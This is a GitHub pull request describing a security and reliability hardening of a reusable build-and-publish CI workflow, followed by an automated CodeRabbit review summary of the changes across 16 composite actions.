refactor(ci): harden reusable build/publish workflow and standardize action output

[MusaMisto]

Summary

Hardens the reusable build-and-publish-artifacts pipeline against current GitHub
Actions best practices and standardizes log/annotation output across the repo's
composite actions. Three themes: security/least-privilege, reliability, and
developer experience (cleaner logs). No change to the public input/secret/output
contract of the reusable workflow.

Reusable workflow (reusable-build-and-publish-artifacts.yml)

Security & least privilege

• Top-level permissions dropped to contents: read; each job now escalates only
  what it needs (version→read, nuget/ci→read + packages: write,
  tag→contents: write). Removes the blanket contents: write previously granted
  to every job.
• Script-injection hardening: all ${{ … }} values are passed via env: and
  referenced as $VAR inside run: blocks (no direct interpolation into shell).
• persist-credentials: false on the ci/nuget checkouts (neither pushes via git).
• Header documents a fork-PR / pull_request_target safety warning for callers.

Reliability

• Added concurrency (per-ref, cancel-in-progress: false) so concurrent runs can't
  race the tag-based semver and collide when tagging — without interrupting an
  in-flight registry push.
• Git tag creation moved to a final tag job that runs only after version + ci
  (and nuget, when present) succeed, so tags never point at an unpublished build.
• timeout-minutes on every job.
• Chart.yaml/values.yaml edits switched from line-oriented sed to structural yq
  (preserves sibling/unrelated keys; creates appVersion if absent), plus a
  helm lint gate before packaging.

Performance

• NuGet restore caching in the dotnet-build composite (~/.nuget/packages, keyed on
  project/package manifests). Docker layer caching (type=gha) was already in place.

Output cleanup (reusable workflow + 16 composite actions)

Aligns all actions with GitHub guidance that annotations are for sparse, actionable
signals while job summaries / collapsible groups carry rich output:

• Removed every "Job Started" and per-step "✅ success" ::notice:: (annotation-panel
  spam). The pipeline now emits one run-level ::notice:: — a pointer to the
  published artifact.
• Success/status info preserved as ✅ lines inside ::group::s; console key/value
  output aligned.
• Degradation/skip cases promoted from invisible echo "Warning:" to real
  ::warning:: annotations.
• Per-action ::error:: failure annotations retained unchanged.

Behavior change to note for reviewers

The git tag is now created after a successful build (was up-front). A green run
tags at the very end; anything keyed on the tag appearing early will see it last.
This is the intended fix for orphaned tags from failed builds.

Verification

• actionlint on the workflow: clean (validates expressions incl. the tag job's
  if:, and shellchecks run: steps).
• bash -n across all 96 run: blocks (workflow + composites): 0 syntax errors.
• yq metadata logic executed against real Chart.yaml/values.yaml fixtures
  (mikefarah v4): version/appVersion/image.repository/image.tag set correctly,
  sibling and unrelated keys preserved.
• YAML parse, ::group::/::endgroup:: balance, and annotation inventory verified
  across all 17 files; diffs are output-only; no trailing whitespace introduced.

Not covered: a live end-to-end run (requires hosted runner, real secrets, and
GHCR/registry auth) — concurrency/tag-timing and registry push are unproven locally.

Summary by CodeRabbit

• New Features

  • Introduced a new reusable GitHub Actions workflow for building, testing, and publishing Docker images and Helm charts with automatic semantic versioning and multi-platform support.
  • Added NuGet package caching for significantly faster build times.

• Chores

  • Simplified and improved CI/CD status messaging, checkpoint tracking, and error/warning reporting across all build actions for better clarity.

[coderabbitai]

Caution

Review failed

Pull request was closed or merged during review

📝 Walkthrough

Walkthrough

Across 16 composite GitHub Actions, "Announce" initialization steps are replaced with "Initialize" steps that only write pending checkpoint statuses to GITHUB_ENV, ::notice success annotations are replaced with plain echo lines, and plain warning strings are upgraded to ::warning title=... annotations. dotnet-build additionally gains a NuGet package cache step. A new 650-line reusable workflow (reusable-build-and-publish-artifacts.yml) is added that orchestrates SemVer computation, optional NuGet publishing, Docker image build/push, Helm chart update/package/OCI-push, and gated git tagging.

Changes

Logging standardization across composite actions

Layer / File(s)	Summary
.NET build and pack/push logging + NuGet cache .github/actions/dotnet-build/action.yml, .github/actions/dotnet-pack-push/action.yml	dotnet-build replaces the announce step with an initialize step and adds actions/cache@v4 for ~/.nuget/packages keyed on OS and manifest file hashes. dotnet-pack-push removes ::notice announcements, upgrades missing-.csproj warnings to ::warning annotations, and simplifies post-pack/post-push echo lines.
Helm actions logging standardization .github/actions/helm-deploy/action.yml, .github/actions/helm-deploy-s9generic/action.yml, .github/actions/helm-generic/action.yml, .github/actions/helm-package-push/action.yml	All four Helm actions replace "Announce" steps with "Initialize" steps writing pending checkpoint statuses to GITHUB_ENV, convert kubeconfig-configured and chart-deployed ::notice annotations to plain echo lines, and upgrade missing image.repository/image.tag warnings to ::warning title=... annotations.
iOS/Xcode actions logging standardization .github/actions/ios-install-cert/action.yml, .github/actions/ios-install-profile/action.yml, .github/actions/xcode-build/action.yml, .github/actions/xcode-export/action.yml	Notice-based announcements replaced with dedicated initialize steps; success ::notice annotations replaced with plain echo lines; xcode-build adds a ::warning annotation for the xcpretty-missing fallback path.
Remaining actions logging standardization .github/actions/determine-semver/action.yml, .github/actions/docker-build-push/action.yml, .github/actions/generate-wrangler-config/action.yml, .github/actions/setup-cloudflare-domain/action.yml, .github/actions/setup-cloudflare-project/action.yml, .github/actions/tag-github-origin/action.yml	Announce steps replaced with initialize steps across all six actions; ::notice annotations replaced with plain echo lines; setup-cloudflare-domain upgrades two warning paths to ::warning title=... annotations; docker-build-push adds IMAGE_NAME/VERSION/DIGEST/REGISTRY env vars to confirmation steps.

New reusable build-and-publish-artifacts workflow

Layer / File(s)	Summary
Workflow contract .github/workflows/reusable-build-and-publish-artifacts.yml (lines 1–245)	Defines the workflow_call entrypoint with required chart-name, optional inputs for major/minor version, .NET/NuGet, Docker, and Helm configuration, secrets for registry/NuGet/PAT auth, outputs for version/docker-image/helm-chart, least-privilege permissions, and per-ref concurrency cancellation.
version and nuget jobs .github/workflows/reusable-build-and-publish-artifacts.yml (lines 251–347)	version job checks out the repo and computes the next SemVer via determine-semver. Conditional nuget job (runs only when nuget-projects is non-empty) calls dotnet-build then dotnet-pack-push, followed by a publishing summary.
ci job: Helm validation, Docker build/push, Helm chart update/push .github/workflows/reusable-build-and-publish-artifacts.yml (lines 348–629)	Implements four checkpoint-tracked stages: validates chart-name against Chart.yaml, builds and pushes the Docker image, updates chart version/appVersion and optional values.yaml image fields, lints/packages the chart with deterministic .tgz naming, and pushes it to GHCR as an OCI artifact. Emits failure annotations with checkpoint breakdown and writes an install snippet to the job summary.
tag job .github/workflows/reusable-build-and-publish-artifacts.yml (lines 630–650)	Gates git tagging on successful version and ci jobs (with nuget success or skipped), then calls tag-github-origin using a github-token secret or fallback GITHUB_TOKEN.

Sequence Diagram(s)

sequenceDiagram
    participant caller as Caller workflow
    participant version as version job
    participant nuget as nuget job (conditional)
    participant ci as ci job
    participant tag as tag job

    caller->>version: workflow_call (major, minor, chart-name, ...)
    version->>version: determine-semver → computed version
    version-->>caller: outputs.version

    alt nuget-projects non-empty
        nuget->>nuget: dotnet-build (restore/build/test)
        nuget->>nuget: dotnet-pack-push → NuGet source
    end

    ci->>ci: validate chart-name == Chart.yaml name
    ci->>ci: docker-build-push → GHCR image + digest
    ci->>ci: update chart version/appVersion, values.yaml
    ci->>ci: helm lint + package → .tgz
    ci->>ci: helm push OCI → GHCR
    ci-->>caller: outputs.docker-image, outputs.helm-chart

    tag->>tag: tag-github-origin (version tag)

Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

Possibly related PRs

• simplify9/.github#16: Adds the same nuget job pattern (dotnet-build + dotnet-pack-push) that is integrated into the new reusable-build-and-publish-artifacts.yml workflow.
• simplify9/.github#83: Modifies the same iOS composite actions (ios-install-cert, ios-install-profile, xcode-build) for checkpoint/notice logging, directly overlapping with this PR's changes to those files.
• simplify9/.github#100: Introduces and rewires HELM_GENERIC_* checkpoint/status variables in helm-generic/action.yml, which this PR further adjusts.

Suggested reviewers

• omarghatasheh

🐇 No more notices filling up the log,
Just plain little echoes, clear as a frog!
✅ Pending to Passed, the checkpoints align,
A workflow is born — Docker, Helm, so divine.
The bunny hops fast through each versioned deploy,
Then tags the git tree with a leap of pure joy! 🏷️

🚥 Pre-merge checks | ✅ 5

✅ Passed checks (5 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The PR title accurately reflects the main changes: refactoring the reusable build/publish workflow and standardizing action outputs across multiple composite actions.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check	✅ Passed	Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check	✅ Passed	Check skipped because no linked issues were found for this pull request.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Commit unit tests in branch update/sw-cicd

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}